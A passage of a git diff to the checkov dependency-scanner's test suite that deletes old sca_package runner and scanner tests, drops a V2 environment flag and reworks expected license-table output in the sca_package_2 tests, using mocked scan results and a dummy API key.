-        "path/to/requirements.txt.django",
-        "path/to/requirements.txt.flask",
-        "path/to/requirements.txt.requests",
-        "path/to/sub/requirements.txt.requests",
-    }
-    assert len(report.passed_checks) == 4
-    assert len(report.failed_checks) == 9
-    assert len(report.skipped_checks) == 0
-    assert len(report.parsing_errors) == 0
-
-    cve_record = next((c for c in report.failed_checks if c.resource == "path/to/go.sum.golang.org/x/crypto" and c.check_name == "SCA package scan"), None)
-    assert cve_record is not None
-    assert cve_record.bc_check_id == "BC_CVE_2020_29652"
-    assert cve_record.check_id == "CKV_CVE_2020_29652"
-    assert cve_record.check_class == "unittest.mock.MagicMock"  # not the real one
-    assert cve_record.check_name == "SCA package scan"
-    assert cve_record.check_result == {"result": CheckResult.FAILED}
-    assert cve_record.code_block == [(0, "golang.org/x/crypto: v0.0.1")]
-    assert cve_record.description == (
-        "A nil pointer dereference in the golang.org/x/crypto/ssh component through v0.0.3 "
-        "for Go allows remote attackers to cause a denial of service against SSH servers."
-    )
-    assert cve_record.file_abs_path == "/path/to/go.sum"
-    assert cve_record.file_line_range == [0, 0]
-    assert cve_record.file_path == "/path/to/go.sum"
-    assert cve_record.repo_file_path == "/path/to/go.sum"
-    assert cve_record.resource == "path/to/go.sum.golang.org/x/crypto"
-    assert cve_record.severity == Severities[BcSeverities.HIGH]
-    assert cve_record.short_description == "CVE-2020-29652 - golang.org/x/crypto: v0.0.1"
-    assert cve_record.vulnerability_details["lowest_fixed_version"] == "0.0.2"
-    assert cve_record.vulnerability_details["fixed_versions"] == [
-        packaging_version.parse("v0.0.2"),
-    ]
-
-    # making sure cve-records have licenses (the one belongs to the associated package) - this data will be printed
-    # as part of the BON report.
-    cve_record_with_license = next((c for c in report.failed_checks if c.resource == "path/to/requirements.txt.django" and c.check_name == "SCA package scan"), None)
-    assert cve_record_with_license is not None
-    assert "licenses" in cve_record_with_license.vulnerability_details
-    assert cve_record_with_license.vulnerability_details["licenses"] == "OSI_BDS"
-
-    cve_record_with_2_license = next((c for c in report.failed_checks if c.resource == "path/to/requirements.txt.flask" and c.check_name == "SCA package scan"), None)
-    assert cve_record_with_2_license is not None
-    assert "licenses" in cve_record_with_2_license.vulnerability_details
-    assert cve_record_with_2_license.vulnerability_details["licenses"] == '"OSI_APACHE","DUMMY_OTHER_LICENSE"'
-
-    # making sure extra-resources (a scanned packages without cves) also have licenses - this data will be printed
-    # as part of the BON report.
-    extra_resource = next((c for c in report.extra_resources if c.resource == "path/to/requirements.txt.requests"), None)
-    assert extra_resource is not None
-    assert "licenses" in extra_resource.vulnerability_details
-    assert extra_resource.vulnerability_details["licenses"] == "OSI_APACHE"
-
-    license_resource = next((c for c in report.failed_checks if c.check_name == "SCA license" if c.resource == "path/to/requirements.txt.flask"), None)
-    assert license_resource is not None
-    assert license_resource.check_id == "BC_LIC_1"
-    assert license_resource.bc_check_id == "BC_LIC_1"
-    assert license_resource.check_result == {"result": CheckResult.FAILED}
-    assert {"package_name", "package_name", "license", "status", "policy"} <= license_resource.vulnerability_details.keys()
-    assert license_resource.vulnerability_details["package_name"] == "flask"
-    assert license_resource.vulnerability_details["package_version"] == "0.6"
-    assert license_resource.vulnerability_details["license"] == "DUMMY_OTHER_LICENSE"
-    assert license_resource.vulnerability_details["status"] == "FAILED"
-    assert license_resource.vulnerability_details["policy"] == "BC_LIC_1"
-
-
-def test_runner_honors_enforcement_rules(mocker: MockerFixture, scan_result):
-    # given
-    bc_integration.bc_api_key = "abcd1234-abcd-1234-abcd-1234abcd1234"
-    scanner_mock = MagicMock()
-    scanner_mock.return_value.scan.return_value = scan_result
-    mocker.patch("checkov.sca_package.runner.Scanner", side_effect=scanner_mock)
-
-    # when
-    runner = Runner()
-    filter = RunnerFilter(framework=['sca_package'], use_enforcement_rules=True)
-    # this is not quite a true test, because the checks don't have severities. However, this shows that the check registry
-    # passes the report type properly to RunnerFilter.should_run_check, and we have tests for that method
-    filter.enforcement_rule_configs = {
-        CheckType.SCA_PACKAGE: {
-            CodeCategoryType.LICENSES: Severities[BcSeverities.OFF],
-            CodeCategoryType.VULNERABILITIES: Severities[BcSeverities.OFF]
-        }
-    }
-    report = runner.run(root_folder=EXAMPLES_DIR, runner_filter=filter)
-
-    # then
-    summary = report.get_summary()
-    # then
-    assert summary["passed"] == 0
-    assert summary["failed"] == 0
-    assert summary["skipped"] > 0
-
-    assert any(c for c in report.skipped_checks if c.check_id.startswith('CKV_CVE'))
-    assert any(c for c in report.skipped_checks if c.check_id.startswith('BC_LIC'))
-
-    assert summary["parsing_errors"] == 0
-
-
-def test_run_license_policy(mocker: MockerFixture, scan_result):
-    # given
-    bc_integration.bc_api_key = "abcd1234-abcd-1234-abcd-1234abcd1234"
-    scanner_mock = MagicMock()
-    scanner_mock.return_value.scan.return_value = scan_result
-    mocker.patch("checkov.sca_package.runner.Scanner", side_effect=scanner_mock)
-
-    # when
-    runner = Runner()
-    filter = RunnerFilter(framework=['sca_package'], checks=['BC_LIC_1'])
-    report = runner.run(root_folder=EXAMPLES_DIR, runner_filter=filter)
-
-    # then
-    assert not [c for c in report.passed_checks + report.failed_checks if c.check_id.startswith('CKV_CVE')]
-
-
-def test_run_with_empty_scan_result(mocker: MockerFixture):
-    # given
-    bc_integration.bc_api_key = "abcd1234-abcd-1234-abcd-1234abcd1234"
-    scanner_mock = MagicMock()
-    scanner_mock.return_value.scan.return_value = []
-    mocker.patch("checkov.sca_package.runner.Scanner", side_effect=scanner_mock)
-
-    # when
-    report = Runner().run(root_folder=EXAMPLES_DIR)
-
-    # then
-    assert report.check_type == "sca_package"
-    assert report.resources == set()
-
-
-def test_run_with_skip(sca_package_report_with_skip):
-    # given
-    report = sca_package_report_with_skip
-
-    # then
-    assert report.check_type == "sca_package"
-    assert report.resources == {
-        "path/to/go.sum.github.com/dgrijalva/jwt-go",
-        "path/to/go.sum.golang.org/x/crypto",
-        "path/to/requirements.txt.django",
-        "path/to/requirements.txt.flask",
-        "path/to/requirements.txt.requests",
-        "path/to/sub/requirements.txt.requests",
-    }
-    assert len(report.passed_checks) == 4
-    assert len(report.failed_checks) == 8
-    assert len(report.skipped_checks) == 1
-    assert len(report.parsing_errors) == 0
-
-    record = report.skipped_checks[0]
-    assert record.check_id == "CKV_CVE_2020_29652"
-
-
-def test_prepare_and_scan(mocker: MockerFixture, scan_result):
-    # given
-    bc_integration.bc_api_key = "abcd1234-abcd-1234-abcd-1234abcd1234"
-    scanner_mock = MagicMock()
-    scanner_mock.return_value.scan.return_value = scan_result
-    mocker.patch("checkov.sca_package.runner.Scanner", side_effect=scanner_mock)
-
-    # when
-    runner = Runner()
-    real_result = runner.prepare_and_scan(root_folder=EXAMPLES_DIR)
-
-    # then
-    assert real_result is not None
-    assert runner._check_class == 'unittest.mock.MagicMock'
-    assert runner._code_repo_path == EXAMPLES_DIR
-
-
-def test_find_scannable_files():
-    # when
-    input_paths = Runner().find_scannable_files(
-        root_path=EXAMPLES_DIR,
-        files=[],
-        excluded_paths=set(),
-    )
-
-    # then
-    assert len(input_paths) == 3
-
-    assert input_paths == {
-        EXAMPLES_DIR / "go.sum",
-        EXAMPLES_DIR / "package-lock.json",
-        EXAMPLES_DIR / "requirements.txt"
-    }
-
-
-def test_find_scannable_files_exclude_go_and_requirements():
-    # when
-    input_output_paths = Runner().find_scannable_files(
-        root_path=EXAMPLES_DIR,
-        files=[],
-        excluded_paths=set(),
-        excluded_file_names=set({"go.sum", "package-lock.json"})
-    )
-
-    # then
-    assert len(input_output_paths) == 1
-
-    assert input_output_paths == {
-        EXAMPLES_DIR / "requirements.txt"
-    }
-
-def test_find_scannable_files_extra_supported_packages():
-    # when
-    input_output_paths = Runner().find_scannable_files(
-        root_path=EXAMPLES_DIR,
-        files=[],
-        excluded_paths=set(),
-        excluded_file_names={"go.sum", "yarn.lock"},
-        extra_supported_package_files={'yarn.lock'}
-    )
-
-    # then
-    assert len(input_output_paths) == 2
-
-    assert input_output_paths == {
-        EXAMPLES_DIR / "requirements.txt",
-        EXAMPLES_DIR / "package-lock.json"
-    }
-
-def test_find_scannable_files_extra_supported_packages2():
-    # when
-    input_output_paths = Runner().find_scannable_files(
-        root_path=EXAMPLES_DIR,
-        files=[],
-        excluded_paths=set(),
-        excluded_file_names={"go.sum", "yarn.lock"},
-        extra_supported_package_files={'yarn.lock', 'package-lock.json'}
-    )
-
-    # then
-    assert len(input_output_paths) == 2
-
-    assert input_output_paths == {
-        EXAMPLES_DIR / "requirements.txt",
-        EXAMPLES_DIR / "package-lock.json"
-    }
-
-def test_find_scannable_files_extra_supported_packages3():
-    # when
-    input_output_paths = Runner().find_scannable_files(
-        root_path=EXAMPLES_DIR,
-        files=[],
-        excluded_paths=set(),
-        excluded_file_names={"go.sum", "yarn.lock", 'package-lock.json'},
-        extra_supported_package_files={'yarn.lock', 'package-lock.json'}
-    )
-
-    # then
-    assert len(input_output_paths) == 1
-
-    assert input_output_paths == {
-        EXAMPLES_DIR / "requirements.txt"
-    }
-
-
-def test_find_scannable_files_with_package_json():
-    # when
-    input_paths = Runner().find_scannable_files(
-        root_path=EXAMPLES_DIR,
-        files=[],
-        excluded_paths=set(),
-        exclude_package_json=False,
-    )
-
-    # then
-    assert len(input_paths) == 4
-
-    assert input_paths == {
-        EXAMPLES_DIR / "go.sum",
-        EXAMPLES_DIR / "package.json",
-        EXAMPLES_DIR / "package-lock.json",
-        EXAMPLES_DIR / "requirements.txt"
-    }
diff --git a/tests/sca_package/test_scanner.py b/tests/sca_package/test_scanner.py
deleted file mode 100644
index 5a608042a2c..00000000000
--- a/tests/sca_package/test_scanner.py
+++ /dev/null
@@ -1,79 +0,0 @@
-import asyncio
-from pathlib import Path
-import responses
-from checkov.common.util.tqdm_utils import ProgressBar
-
-from checkov.sca_package.scanner import Scanner
-
-EXAMPLES_DIR = Path(__file__).parent / "examples"
-
-
-@responses.activate
-def test_run_scan(mock_bc_integration, scan_result2, scan_result_success_response):
-    # given
-    responses.add(
-        method=responses.POST,
-        url=mock_bc_integration.api_url + "/api/v1/vulnerabilities/scan",
-        json={'id': '2e97f5afea42664309f492a1e2083b43479c2935', 'status': 'running'},
-        status=202,
-    )
-
-    responses.add(
-        method=responses.GET,
-        url=mock_bc_integration.api_url + "/api/v1/vulnerabilities/scan-results/"
-                                             "2e97f5afea42664309f492a1e2083b43479c2935",
-        json=scan_result_success_response,
-        status=200
-    )
-
-    # when
-    pbar = ProgressBar('')
-    pbar.turn_off_progress_bar()
-    scanner = Scanner(pbar)
-    result = asyncio.run(scanner.run_scan((Path(EXAMPLES_DIR / "requirements.txt"))))
-
-    # then
-    assert len(result) == len(scan_result2)
-    assert result.keys() == scan_result2.keys()
-    assert len(result.get("packages")) == len(scan_result2.get("packages"))
-    result_vuln_len = len(result.get("vulnerabilities"))
-    scan_result_vuln_len = len(scan_result2.get("vulnerabilities"))
-    assert result_vuln_len == scan_result_vuln_len
-    assert sorted([result.get("vulnerabilities")[i]["id"] for i in range(result_vuln_len)]) == \
-        sorted([scan_result2.get("vulnerabilities")[i]["id"] for i in range(scan_result_vuln_len)])
-    assert result.get("complianceDistribution") == scan_result2.get("complianceDistribution")
-    assert result.get("vulnerabilityDistribution") == scan_result2.get("vulnerabilityDistribution")
-    responses.assert_call_count(mock_bc_integration.api_url + "/api/v1/vulnerabilities/scan", 1)
-    assert len(responses.calls) >= 2
-
-
-@responses.activate
-def test_run_scan_fail_on_scan(mock_bc_integration):
-    # given
-    responses.add(
-        method=responses.POST,
-        url=mock_bc_integration.api_url + "/api/v1/vulnerabilities/scan",
-        json={'id': '2e97f5afea42664309f492a1e2083b43479c2936', 'status': 'running'},
-        status=202,
-    )
-
-    responses.add(
-        method=responses.GET,
-        url=mock_bc_integration.api_url + "/api/v1/vulnerabilities/scan-results/"
-                                             "2e97f5afea42664309f492a1e2083b43479c2936",
-        json={
-            "outputType": "Error",
-            "outputData": "error_message"
-        },
-        status=400,
-    )
-
-    # when
-    pbar = ProgressBar('')
-    pbar.turn_off_progress_bar()
-    result = asyncio.run(Scanner(pbar).run_scan(input_path=Path(EXAMPLES_DIR / "requirements.txt")))
-
-    # then
-    assert result == {}
-    responses.assert_call_count(mock_bc_integration.api_url + "/api/v1/vulnerabilities/scan", 1)
-    assert len(responses.calls) >= 2
diff --git a/tests/sca_package_2/conftest.py b/tests/sca_package_2/conftest.py
index 101b4c83d94..47e8fc6095e 100644
--- a/tests/sca_package_2/conftest.py
+++ b/tests/sca_package_2/conftest.py
@@ -20,7 +20,7 @@
 
 @pytest.fixture(autouse=True)
 def mock_env_vars():
-    with mock.patch.dict(os.environ, {"CHECKOV_RUN_SCA_PACKAGE_SCAN_V2": "true"}):
+    with mock.patch.dict(os.environ, {}):
         yield
 
 
@@ -1039,7 +1039,7 @@ def scan_result_2_with_comma_in_licenses() -> Dict[str, Any]:
 
 
 @pytest.fixture()
-@mock.patch.dict(os.environ, {'CHECKOV_RUN_SCA_PACKAGE_SCAN_V2': 'true'})
+@mock.patch.dict(os.environ, {})
 def scan_result_success_response() -> Dict[str, Any]:
     return {'outputType': 'Result',
             'outputData': "H4sIAN22X2IC/8WY23LbOBKGX6VLN5tUWRQp"
@@ -1078,7 +1078,7 @@ def scan_result_success_response() -> Dict[str, Any]:
 
 
 @pytest.fixture(scope='package')
-@mock.patch.dict(os.environ, {'CHECKOV_RUN_SCA_PACKAGE_SCAN_V2': 'true'})
+@mock.patch.dict(os.environ, {})
 def sca_package_2_report(package_mocker: MockerFixture, scan_result_2: Dict[str, Any]) -> Report:
     bc_integration.bc_api_key = "abcd1234-abcd-1234-abcd-1234abcd1234"
     scanner_mock = MagicMock()
@@ -1095,7 +1095,7 @@ def none() -> None:
 
 
 @pytest.fixture(scope='package')
-@mock.patch.dict(os.environ, {'CHECKOV_RUN_SCA_PACKAGE_SCAN_V2': 'true'})
+@mock.patch.dict(os.environ, {})
 def sca_package_report_dt(package_mocker: MockerFixture, scan_results_dt: Dict[str, Any]) -> Generator[Report, None, None]:
     orig_bc_api_key = bc_integration.bc_api_key
     orig_bc_source = bc_integration.bc_source
@@ -1725,7 +1725,7 @@ def create_cli_output_wrapper(with_line_numbers: bool) -> str:
     # given
     rootless_file_path = "requirements.txt"
     file_abs_path = "/path/to/requirements.txt"
-    check_class = "checkov.sca_package.scanner.Scanner"
+    check_class = "checkov.sca_package_2.scanner.Scanner"
     packages = {
         get_package_alias("django", "1.2"): {
             'package_registry': "https://registry.npmjs.org/",
diff --git a/tests/sca_package_2/test_output.py b/tests/sca_package_2/test_output.py
index f73de6fe006..d29cb638f7c 100644
--- a/tests/sca_package_2/test_output.py
+++ b/tests/sca_package_2/test_output.py
@@ -25,7 +25,7 @@ def test_create_report_cve_record():
     # given
     rootless_file_path = "requirements.txt"
     file_abs_path = "/path/to/requirements.txt"
-    check_class = "checkov.sca_package.scanner.Scanner"
+    check_class = "checkov.sca_package_2.scanner.Scanner"
     vulnerability_details = {
         "id": "CVE-2019-19844",
         "status": "fixed in 3.0.1, 2.2.9, 1.11.27",
@@ -96,7 +96,7 @@ def test_create_report_cve_record_results_from_platform():
     # given
     rootless_file_path = "requirements.txt"
     file_abs_path = "/path/to/requirements.txt"
-    check_class = "checkov.sca_package.scanner.Scanner"
+    check_class = "checkov.sca_package_2.scanner.Scanner"
     vulnerability_details = {
         "severity": "CRITICAL",
         "riskFactors": "{\"Critical severity\":{},\"Attack vector: network\":{},\"Has fix\":{},\"Attack complexity: low\":{}}",
@@ -168,7 +168,7 @@ def test_create_report_cve_record_moderate_severity():
     # given
     rootless_file_path = "requirements.txt"
     file_abs_path = "/path/to/requirements.txt"
-    check_class = "checkov.sca_package.scanner.Scanner"
+    check_class = "checkov.sca_package_2.scanner.Scanner"
     vulnerability_details = {
         "id": "CVE-2019-19844",
         "status": "fixed in 3.0.1, 2.2.9, 1.11.27",
@@ -209,7 +209,7 @@ def test_create_report_cve_record_severity_filter():
     # given
     rootless_file_path = "requirements.txt"
     file_abs_path = "/path/to/requirements.txt"
-    check_class = "checkov.sca_package.scanner.Scanner"
+    check_class = "checkov.sca_package_2.scanner.Scanner"
     vulnerability_details = {
         "id": "CVE-2019-19844",
         "status": "fixed in 3.0.1, 2.2.9, 1.11.27",
@@ -274,7 +274,7 @@ def test_create_report_cve_record_package_filter():
     # given
     rootless_file_path = "requirements.txt"
     file_abs_path = "/path/to/requirements.txt"
-    check_class = "checkov.sca_package.scanner.Scanner"
+    check_class = "checkov.sca_package_2.scanner.Scanner"
     vulnerability_details = {
         "id": "CVE-2019-19844",
         "status": "fixed in 3.0.1, 2.2.9, 1.11.27",
@@ -442,16 +442,16 @@ def test_create_cli_license_violations_table_no_line_numbers():
     assert table == "".join(
         [
             "\t/requirements.txt - Licenses Statuses:\n",
-            "\t┌──────────────────────────┬──────────────────────────┬──────────────────────────┬──────────────────────────┬───────────────────────────┐\n",
-            "\t│ Package name             │ Package version          │ Policy ID                │ License                  │ Status                    │\n",
-            "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n",
-            "\t│ django                   │ 1.2                      │ BC_LIC_1                 │ DUMMY_LICENSE            │ OPEN                      │\n",
-            "\t│                          │                          │ BC_LIC_1                 │ DUMMY_LICENSE2           │ OPEN                      │\n",
-            "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n",
-            "\t│ django                   │ 1.12                     │ BC_LIC_1                 │ DUMMY_LICENSE3           │ OPEN                      │\n",
-            "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n",
-            "\t│ flask                    │ 0.6                      │ BC_LIC_1                 │ DUMMY_LICENSE3           │ OPEN                      │\n",
-            "\t└──────────────────────────┴──────────────────────────┴──────────────────────────┴──────────────────────────┴───────────────────────────┘\n",
+            "\t┌────────────────────────────────┬────────────────────────────────┬────────────────────────────────┬────────────────────────────────────┐\n",
+            "\t│ Package name                   │ Package version                │ Policy ID                      │ License                            │\n",
+            "\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n",
+            "\t│ django                         │ 1.2                            │ BC_LIC_1                       │ DUMMY_LICENSE                      │\n",
+            "\t│                                │                                │ BC_LIC_1                       │ DUMMY_LICENSE2                     │\n",
+            "\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n",
+            "\t│ django                         │ 1.12                           │ BC_LIC_1                       │ DUMMY_LICENSE3                     │\n",
+            "\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n",
+            "\t│ flask                          │ 0.6                            │ BC_LIC_1                       │ DUMMY_LICENSE3                     │\n",
+            "\t└────────────────────────────────┴────────────────────────────────┴────────────────────────────────┴────────────────────────────────────┘\n",
         ]
     )
 
@@ -464,16 +464,16 @@ def test_create_cli_license_violations_table_with_line_numbers():
     assert table == "".join(
         [
             "\t/requirements.txt - Licenses Statuses:\n",
-            "\t┌──────────────────────────┬──────────────────────────┬──────────────────────────┬──────────────────────────┬───────────────────────────┐\n",
-            "\t│ Package name [Lines]     │ Package version          │ Policy ID                │ License                  │ Status                    │\n",
-            "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n",
-            "\t│ django [1-2]             │ 1.2                      │ BC_LIC_1                 │ DUMMY_LICENSE            │ OPEN                      │\n",
-            "\t│                          │                          │ BC_LIC_1                 │ DUMMY_LICENSE2           │ OPEN                      │\n",
-            "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n",
-            "\t│ django                   │ 1.12                     │ BC_LIC_1                 │ DUMMY_LICENSE3           │ OPEN                      │\n",
-            "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n",
-            "\t│ flask [5-6]              │ 0.6                      │ BC_LIC_1                 │ DUMMY_LICENSE3           │ OPEN                      │\n",
-            "\t└──────────────────────────┴──────────────────────────┴──────────────────────────┴──────────────────────────┴───────────────────────────┘\n",
+            "\t┌────────────────────────────────┬────────────────────────────────┬────────────────────────────────┬────────────────────────────────────┐\n",
+            "\t│ Package name [Lines]           │ Package version                │ Policy ID                      │ License                            │\n",
+            "\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n",
+            "\t│ django [1-2]                   │ 1.2                            │ BC_LIC_1                       │ DUMMY_LICENSE                      │\n",
+            "\t│                                │                                │ BC_LIC_1                       │ DUMMY_LICENSE2                     │\n",
+            "\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n",
+            "\t│ django                         │ 1.12                           │ BC_LIC_1                       │ DUMMY_LICENSE3                     │\n",
+            "\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n",
+            "\t│ flask [5-6]                    │ 0.6                            │ BC_LIC_1                       │ DUMMY_LICENSE3                     │\n",
+            "\t└────────────────────────────────┴────────────────────────────────┴────────────────────────────────┴────────────────────────────────────┘\n",
         ]
     )
 
@@ -527,16 +527,16 @@ def test_create_cli_output_no_line_numbers():
             "\t└──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┘\n"
             "\n",
             "\t/requirements.txt - Licenses Statuses:\n",
-            "\t┌──────────────────────────┬──────────────────────────┬──────────────────────────┬──────────────────────────┬───────────────────────────┐\n"
-            "\t│ Package name             │ Package version          │ Policy ID                │ License                  │ Status                    │\n"
-            "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n"
-            "\t│ django                   │ 1.2                      │ BC_LIC_1                 │ DUMMY_LICENSE            │ FAILED                    │\n"
-            "\t│                          │                          │ BC_LIC_1                 │ DUMMY_LICENSE2           │ FAILED                    │\n"
-            "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n"
-            "\t│ django                   │ 1.12                     │ BC_LIC_2                 │ DUMMY_LICENSE_3          │ FAILED                    │\n"
-            "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n"
-            "\t│ flask                    │ 0.6                      │ BC_LIC_1                 │ DUMMY_OTHER_LICENSE      │ FAILED                    │\n"
-            "\t└──────────────────────────┴──────────────────────────┴──────────────────────────┴──────────────────────────┴───────────────────────────┘\n"
+            "\t┌────────────────────────────────┬────────────────────────────────┬────────────────────────────────┬────────────────────────────────────┐\n",
+            "\t│ Package name                   │ Package version                │ Policy ID                      │ License                            │\n",
+            "\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n"
+            "\t│ django                         │ 1.2                            │ BC_LIC_1                       │ DUMMY_LICENSE                      │\n"
+            "\t│                                │                                │ BC_LIC_1                       │ DUMMY_LICENSE2                     │\n"
+            "\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n"
+            "\t│ django                         │ 1.12                           │ BC_LIC_2                       │ DUMMY_LICENSE_3                    │\n"
+            "\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n"
+            "\t│ flask                          │ 0.6                            │ BC_LIC_1                       │ DUMMY_OTHER_LICENSE                │\n"
+            "\t└────────────────────────────────┴────────────────────────────────┴────────────────────────────────┴────────────────────────────────────┘\n"
         ]
     )
 
@@ -562,16 +562,16 @@ def test_create_cli_output_with_line_numbers():
             "\t└──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┘\n"
             "\n",
             "\t/requirements.txt - Licenses Statuses:\n",
-            "\t┌──────────────────────────┬──────────────────────────┬──────────────────────────┬──────────────────────────┬───────────────────────────┐\n"
-            "\t│ Package name [Lines]     │ Package version          │ Policy ID                │ License                  │ Status                    │\n"
-            "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n"
-            "\t│ django [1-2]             │ 1.2                      │ BC_LIC_1                 │ DUMMY_LICENSE            │ FAILED                    │\n"
-            "\t│                          │                          │ BC_LIC_1                 │ DUMMY_LICENSE2           │ FAILED                    │\n"
-            "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n"
-            "\t│ django                   │ 1.12                     │ BC_LIC_2                 │ DUMMY_LICENSE_3          │ FAILED                    │\n"
-            "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n"
-            "\t│ flask [5-6]              │ 0.6                      │ BC_LIC_1                 │ DUMMY_OTHER_LICENSE      │ FAILED                    │\n"
-            "\t└──────────────────────────┴──────────────────────────┴──────────────────────────┴──────────────────────────┴───────────────────────────┘\n"
+            "\t┌────────────────────────────────┬────────────────────────────────┬────────────────────────────────┬────────────────────────────────────┐\n",
+            "\t│ Package name [Lines]           │ Package version                │ Policy ID                      │ License                            │\n",
+            "\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n"
+            "\t│ django [1-2]                   │ 1.2                            │ BC_LIC_1                       │ DUMMY_LICENSE                      │\n"
+            "\t│                                │                                │ BC_LIC_1                       │ DUMMY_LICENSE2                     │\n"
+            "\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n"
+            "\t│ django                         │ 1.12                           │ BC_LIC_2                       │ DUMMY_LICENSE_3                    │\n"
+            "\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n"
+            "\t│ flask [5-6]                    │ 0.6                            │ BC_LIC_1                       │ DUMMY_OTHER_LICENSE                │\n"
+            "\t└────────────────────────────────┴────────────────────────────────┴────────────────────────────────┴────────────────────────────────────┘\n"
         ]
     )
 
@@ -619,7 +619,7 @@ def test_create_cli_output_without_cve_records():
     # given
     rootless_file_path = "requirements.txt"
     file_abs_path = "/path/to/requirements.txt"
-    check_class = "checkov.sca_package.scanner.Scanner"
+    check_class = "checkov.sca_package_2.scanner.Scanner"
     license_statuses = [
         {
             "package_name": "django",
@@ -653,13 +653,13 @@ def test_create_cli_output_without_cve_records():
     assert cli_output == "".join(
         [
             "\t/requirements.txt - Licenses Statuses:\n",
-            "\t┌──────────────────────────┬──────────────────────────┬──────────────────────────┬──────────────────────────┬───────────────────────────┐\n",
-            "\t│ Package name             │ Package version          │ Policy ID                │ License                  │ Status                    │\n",
-            "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n",
-            "\t│ django                   │ 1.2                      │ BC_LIC_1                 │ DUMMY_LICENSE            │ FAILED                    │\n",
-            "\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n",
-            "\t│ flask                    │ 0.6                      │ BC_LIC_1                 │ DUMMY_OTHER_LICENSE      │ FAILED                    │\n",
-            "\t└──────────────────────────┴──────────────────────────┴──────────────────────────┴──────────────────────────┴───────────────────────────┘\n",
+            "\t┌────────────────────────────────┬────────────────────────────────┬────────────────────────────────┬────────────────────────────────────┐\n",
+            "\t│ Package name                   │ Package version                │ Policy ID                      │ License                            │\n",
+            "\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n",
+            "\t│ django                         │ 1.2                            │ BC_LIC_1                       │ DUMMY_LICENSE                      │\n",
+            "\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n",
+            "\t│ flask                          │ 0.6                            │ BC_LIC_1                       │ DUMMY_OTHER_LICENSE                │\n",
+            "\t└────────────────────────────────┴────────────────────────────────┴────────────────────────────────┴────────────────────────────────────┘\n",
         ]
     )
 
diff --git a/tests/sca_package_2/test_output_reports.py b/tests/sca_package_2/test_output_reports.py
index 10ff1dead9d..3456e556ae8 100644
--- a/tests/sca_package_2/test_output_reports.py
+++ b/tests/sca_package_2/test_output_reports.py
@@ -36,7 +36,6 @@ def _get_deterministic_items_in_cyclonedx(pretty_xml_as_list: List[str]) -> List
 
 
 def test_console_output(mocker, sca_package_2_report):
-    mocker.patch("checkov.common.output.report.CHECKOV_RUN_SCA_PACKAGE_SCAN_V2", True)
     console_output = sca_package_2_report.print_console(False, False, None, None, False)
 
     # then
@@ -64,11 +63,11 @@ def test_console_output(mocker, sca_package_2_report):
             '\t└──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┘\n',
             "\n",
             "\t/requirements.txt - Licenses Statuses:\n",
-            '\t┌──────────────────────────┬──────────────────────────┬──────────────────────────┬──────────────────────────┬───────────────────────────┐\n',
-            "\t│ Package name             │ Package version          │ Policy ID                │ License                  │ Status                    │\n",
-            '\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n',
-            '\t│ flask                    │ 0.6                      │ BC_LIC_1                 │ DUMMY_OTHER_LICENSE      │ FAILED                    │\n',
-            '\t└──────────────────────────┴──────────────────────────┴──────────────────────────┴──────────────────────────┴───────────────────────────┘\n',
+            '\t┌────────────────────────────────┬────────────────────────────────┬────────────────────────────────┬────────────────────────────────────┐\n',
+            "\t│ Package name                   │ Package version                │ Policy ID                      │ License                            │\n",
+            '\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n',
+            '\t│ flask                          │ 0.6                            │ BC_LIC_1                       │ DUMMY_OTHER_LICENSE                │\n',
+            '\t└────────────────────────────────┴────────────────────────────────┴────────────────────────────────┴────────────────────────────────────┘\n',
             "\n",
             "\t/path/to/go.sum - CVEs Summary:\n",
